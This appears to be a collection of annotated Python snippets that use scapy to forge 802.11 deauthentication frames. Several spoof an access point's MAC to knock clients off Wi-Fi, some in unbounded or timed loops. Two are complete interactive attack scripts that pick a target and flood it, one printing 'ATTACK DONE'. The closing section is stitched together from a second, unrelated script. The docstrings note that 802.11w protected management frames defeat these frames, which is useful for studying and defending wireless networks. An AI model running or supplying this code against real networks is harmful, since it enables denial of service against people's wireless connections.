Example #1
    def _deauth_target(self, target, packet_count):
        """Send up to ``packet_count`` deauthentication frames to ``target``.

        The frame is RadioTap / Dot11 / Dot11Deauth with ``self._ap_bssid`` as
        both transmitter (addr2) and BSSID (addr3), so the receiver sees it as
        coming from the access point. Sending stops early as soon as
        ``self._thread_event`` is no longer set. On exit a summary line is
        printed and ``self._threads_finished`` is incremented while holding
        ``self._thread_lock``.

        Defensive context: stations that have negotiated 802.11w Protected
        Management Frames (PMF) are expected to ignore unprotected
        deauthentication frames such as this one.

        :param target: MAC address placed in addr1 (the receiver).
        :param packet_count: Number of frames to attempt.
        """
        # Author's note: this also works with subtype 10
        # ("Disassociation-Frame"), verified with an MBP running 10.12.4.
        # type=0 / subtype=12 is a management frame of kind deauthentication;
        # reason=1 is the "unspecified" reason code.
        ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
            type=0,
            subtype=12,
            addr1=target,
            addr2=self._ap_bssid,
            addr3=self._ap_bssid) / scapy.Dot11Deauth(reason=1)

        actually_sent = 0
        # NOTE(review): for packet_count <= 0 the range is empty (falsy), so
        # the `or` yields the bool from `packet_count == -1` and the for
        # statement raises TypeError. -1 is therefore not an "unlimited" mode.
        for n in range(packet_count) or packet_count == -1:
            # The event acts as a keep-running flag: cleared means stop.
            if not self._thread_event.isSet():
                break

            # Pause 0.1 s on every 64th iteration, including the first (n == 0).
            if n % 64 == 0:
                time.sleep(0.1)

            # No iface argument is passed, so interface selection is left to scapy.
            scapy.sendp(ap_to_client_pckt)

            # Holds the index of the last frame sent, not a count.
            actually_sent = n

        # NOTE(review): if the loop breaks before the first send, this still
        # reports 1 packet because actually_sent starts at 0.
        print "Sent " + str(actually_sent + 1) + " packets to " + target

        # Completion counter is updated under the lock.
        with self._thread_lock:
            self._threads_finished += 1
Example #2
def deauth(**kwargs):
    """Send bursts of deauthentication frames between an AP and its clients.

    Options read from ``kwargs``:
        broadcast: when truthy, the only destination is ff:ff:ff:ff:ff:ff and
            no client-to-AP frames are sent.
        clients: iterable of client MAC addresses (not read when broadcasting).
        ap: MAC address used as transmitter/BSSID of the AP-side frame.
        count: number of outer rounds.
        burst-size: frames per direction sent for each client in a round.
        sleep-time: seconds to pause after each client's burst.

    Frames are built as bare Dot11 / Dot11Deauth (no RadioTap layer) and are
    handed to ``sc.send``.

    Defensive context: stations that have negotiated 802.11w Protected
    Management Frames are expected to ignore unprotected deauthentication
    frames like these.
    """
    to_everyone = kwargs.get("broadcast")
    stations = ["ff:ff:ff:ff:ff:ff"] if to_everyone else kwargs.get("clients")
    bssid = kwargs.get("ap")
    rounds = kwargs.get("count")
    burst = kwargs.get("burst-size")
    pause = kwargs.get("sleep-time")

    for _ in range(rounds):
        for station in stations:
            # Frame addressed to the station, with the AP as transmitter.
            from_ap = sc.Dot11(
                addr1=station, addr2=bssid, addr3=bssid) / sc.Dot11Deauth()
            # Frame addressed to the AP, with the station as transmitter.
            from_station = sc.Dot11(
                addr1=bssid, addr2=station, addr3=bssid) / sc.Dot11Deauth()
            for _ in range(burst):
                sc.send(from_ap)
                # The reverse direction is skipped for the broadcast address.
                if not to_everyone:
                    sc.send(from_station)
            # The pause follows each station's burst, not each round.
            time.sleep(pause)
Example #3
 def deuath(self, ap: AccessPoint):
     """
     Broadcast deauthentication frames in the name of the given access point.

     The frame is addressed to FF:FF:FF:FF:FF:FF and carries ``ap.bssid`` as
     both transmitter (addr2) and BSSID (addr3), so it is aimed at the
     stations of that access point rather than at the access point itself.
     Reason code 7 is "class 3 frame received from nonassociated station".

     This method never returns: the same frame is sent on
     ``self._interface`` in an unbounded loop with no stop condition.
     """
     radiotap = scapy.RadioTap()
     dot11 = scapy.Dot11(
         addr1="FF:FF:FF:FF:FF:FF", addr2=ap.bssid, addr3=ap.bssid)
     frame = radiotap / dot11 / scapy.Dot11Deauth(reason=7)
     while True:
         scapy.sendp(frame, iface=self._interface)
Example #4
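    def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
        """Send 100 pairs of deauthentication frames for one AP/client pairing.

        Args:
            ssid: Not used by this method.
            mac: MAC address of the access point; used as the BSSID.
            client: Station MAC address; defaults to the broadcast address.

        The module-level ``ipiw_lock`` is held for the whole operation. Frames
        go out through a single L2 socket opened on ``self.netifmon``.
        """
        ipiw_lock.acquire()
        try:
            # AP -> Client
            p1 = sc.RadioTap() / sc.Dot11(
                type=0,
                subtype=12, addr1=client, addr2=mac, addr3=mac) / sc.Dot11Deauth(
                    reason=5)  # reason = "AP cannot handle this many stations"
            # Client -> AP
            p2 = sc.RadioTap() / sc.Dot11(
                type=0,
                subtype=12, addr1=mac, addr2=client, addr3=mac) / sc.Dot11Deauth(
                    reason=8)  # reason = "Client is leaving"

            # One socket is reused for every send (for performance).
            s = sc.conf.L2socket(iface=self.netifmon)
            try:
                for i in range(100):
                    s.send(p1)
                    s.send(p2)
            finally:
                # Close the socket even when a send raises.
                s.close()
        finally:
            # Release the lock on every exit path; without this, an exception
            # while opening the socket or sending would leave it held.
            ipiw_lock.release()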
Example #5
 def scan(self):
     """Send 10000 deauthentication frames between two hard-coded MACs.

     Despite its name, this method does not scan: it builds one
     RadioTap / Dot11 / Dot11Deauth frame and passes it to ``sendp`` with
     0.2 s spacing on the interface named "Wi-Fi".
     """
     station, gateway = "28:cf:e9:1e:50:2d", "0a:00:27:00:00:0e"
     # 802.11 header: addr1 = destination, addr2 = source, addr3 = access point.
     header = scapy.Dot11(addr1=station, addr2=gateway, addr3=gateway)
     frame = scapy.RadioTap() / header / scapy.Dot11Deauth()
     scapy.sendp(frame, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
Example #6
def craft_deauth_packet(sender, receiver, bssid):
    """
    Build an 802.11 deauthentication frame without sending it

    The frame is RadioTap / Dot11 / Dot11Deauth, with the Dot11 header marked
    as a management frame (type 0) of subtype 12 (deauthentication).

    :param sender: MAC address placed in addr2 (transmitter)
    :param receiver: MAC address placed in addr1 (receiver)
    :param bssid: MAC address of the access point, placed in addr3
    :type sender: str
    :type receiver: str
    :type bssid: str
    :return: The stacked deauthentication frame
    :rtype: scapy.layers.dot11.RadioTap
    """
    radiotap_layer = scapy.RadioTap()
    dot11_layer = scapy.Dot11(
        type=0, subtype=12, addr1=receiver, addr2=sender, addr3=bssid)
    return radiotap_layer / dot11_layer / scapy.Dot11Deauth()
Example #7
def disconnect_device(router_mac: str, target_mac: str, iface: str,
                      count: int):
    """
    Send deauthentication frames to a device in the name of its gateway.

    The frame is RadioTap / Dot11 (type 0, subtype 12) / Dot11Deauth with
    reason code 7, sent at 0.1 s spacing with scapy's output silenced.

    Args:
        router_mac (str): Gateway MAC address; used as transmitter and BSSID.
        target_mac (str): MAC address of the receiving device.
        iface (str): Name of the interface passed to ``sendp``.
        count (int): Number of frames to send. A value of 0 is passed to
            ``sendp`` as ``None``.
    """
    # A count of 0 is translated to None before it reaches sendp.
    burst = None if count == 0 else count
    header = sc.Dot11(
        type=0,
        subtype=12,
        addr1=target_mac,
        addr2=router_mac,
        addr3=router_mac,
    )
    frame = sc.RadioTap() / header / sc.Dot11Deauth(reason=7)
    sc.sendp(frame, inter=0.1, count=burst, iface=iface, verbose=0)
Example #8
# Print the banner.
print(f"{RED}" + start)

# Remind the operator that the wireless card must already be in monitor mode.
print(f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n")

# Read the parameters interactively. None of the values is validated, and a
# non-numeric packet count raises ValueError from int().
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))

# 802.11 header: addr1 = destination, addr2 = source, addr3 = access point.
# Type and subtype are not passed explicitly here.
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)
# Stack RadioTap, the 802.11 header and the deauthentication body (reason 7).
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)

# Each pass hands sendp count=100 at 0.1 s spacing. The bound is inclusive,
# so the loop makes packets + 1 passes.
for p in range(packets + 1):
    scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
    # p is the index of the pass just finished, not a total of frames sent.
    print(f"{YELLOW}[!] Packets send " + str(p))

print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
    apNum = raw_input(
        "Pleas choose Ap from list above to see all devices on  the AP \033[1m--enter Ap number--\033[0m"
    )
    print("connect to: ", ap[int(apNum)])
    #step 3: we scan all devices on the AP
    scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)
    #step 4 :chose Client MAC Address to attack
    macNum = raw_input(
        "Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
    )
    print("connect to: ", clients[int(macNum)])

    # Access Point MAC Address
    ap = ap[int(apNum)]

    # Client MAC Address
    client = clients[int(macNum)]

# Deauthentication frame with the AP as receiver (addr1) and the selected
# client as transmitter (addr2); addr3 is set to the client address as well.
# `ap` and `client` are the entries chosen from the lists earlier in the script.
pkt1 = (
    scapy.RadioTap()
    / scapy.Dot11(addr1=ap, addr2=client, addr3=client)
    / scapy.Dot11Deauth()
)

# Keep sending on "mon0" until 100 seconds of wall-clock time have passed.
t_end = time.time() + 100
while t_end > time.time():
    scapy.sendp(pkt1, iface="mon0", inter=0.001)

# Block until the operator presses Enter.
raw_input(
    " '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")